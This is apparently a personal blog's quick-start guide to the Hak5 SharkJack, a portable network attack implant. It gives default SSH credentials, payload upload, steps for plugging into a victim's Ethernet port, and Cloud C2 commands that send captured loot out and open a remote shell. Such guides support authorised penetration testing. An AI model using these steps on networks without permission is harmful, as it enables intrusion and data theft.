[HOW-TO] Operate the SharkJack 🦈

Published by Alicia's Notes 🚀, View original

A Quick-Start Guide for the Hak5 SharkJack, a portable network attack tool

Access the SharkJack

  1. Switch to Arming Mode (center), and connect to PC via Ethernet
  2. Find the IP: Default is 172.16.24.1, run ifconfig to check
  3. Login: ssh [email protected], using password hak5shark
  4. On first setup, change the default password, run passwd

Navigating the SharkJack

  • The active payload is located at: ~/payload/payload.sh
  • Captured loot is stored with the ~/loot/... directory
  • To save all loot locally, run: scp -r [email protected]:/root/loot/* .
  • To upload a new payload, run scp payload.sh [email protected]:/root/payload/

Conducting an Attack

  1. Flip into Attack Mode (fully forward), and wait for LED to go magenta
  2. Plug device into victim Ethernet port, watch LED's blink
  3. Once LED turns off, unplug device and switch to off

Out-of-the box, the ShakJack comes with an nmap payload, useful for initial network reconnaissance

Additional Tools

CLI Helper Tool

The SharkJack Helper a CLI tool for carrying out common tasks:
Get a shell, push a payload, grab saved loot and upgrade the firmware etc

  1. Download from: https://downloads.hak5.org/shark
  2. Make executable: chmod +x sharkjack.sh
  3. Run ./sharkjack.sh, and follow on-screen prompts

Web Interface

Once the firmware has been updated (V1.01 and newer), you can access the SharkJack's web interface by visiting 172.16.24.1 in your browser. From here you can view and modify the current payload, download your loot and view device status

Cloud C2

  1. Download and run Cloud C2 for your system, from https://shop.hak5.org/products/c2
  2. Go to Add Device --> SharkJack. Then select the listing --> Setup, and config file will download
  3. The device.config needs to be uploaded to /etc. Run scp device.config [email protected]:/ete/
  4. To connect, run CTCONNECT. Back on the web interface, your now able to open a shell, for remote access!
  5. To get the loot, run C2EFIL STRING /root/loot/nmap/nmap-scan_1.txt nmap, data now will show up in Loot tab!

Note that it the SharkJack does not connect to CloudC2 automatically, but by using the CTCONNECT and C2EFIL .. commands to your payload, you'll be able to exfiltrate the loot immediately, and access it remotely.

Reference Info

Switch Positions

  • Back: Off/ Charging
  • Middle: Arming Mode
  • Front: Attack Mode

LET Lights

  • Green (blinking): Booting up
  • Blue (blinking): Charging
  • Blue (solid): Fully Charged
  • Yellow (blinking): Arming Mode
  • Red (blinking): Error / No Payload

Individual Payloads have their own LED routines, but usually:
Red: Setup, Amber: Scanning, Green: Finished

Specifications

  • OS: OpenWRT 19.07-based GNU/Linux
  • SoC: 580MHz MediaTek MT7628DAN mips CPU
  • MEMORY: 64 MB DDR2 RAM, 64 MB SPI Flash
  • IO: RJ45 IEEE 802.3 Ethernet + USB-C charge port
  • DIMENSIONS: 62 x 21 x 12 mm
  • POWER: 2.5W (USB 5V 0.5A)
  • BATTERY: 1S 401020 3.7V 50mAh 0.2W LiPo
  • BATTERY TIMES: ~15 mins run, ~7 mins charge
  • TEMP: Operating- 35ºC ~ 45ºC, Storage -20ºC ~ 50ºC
  • RELATIVE HUMIDITY: 0% to 90% (noncondensing)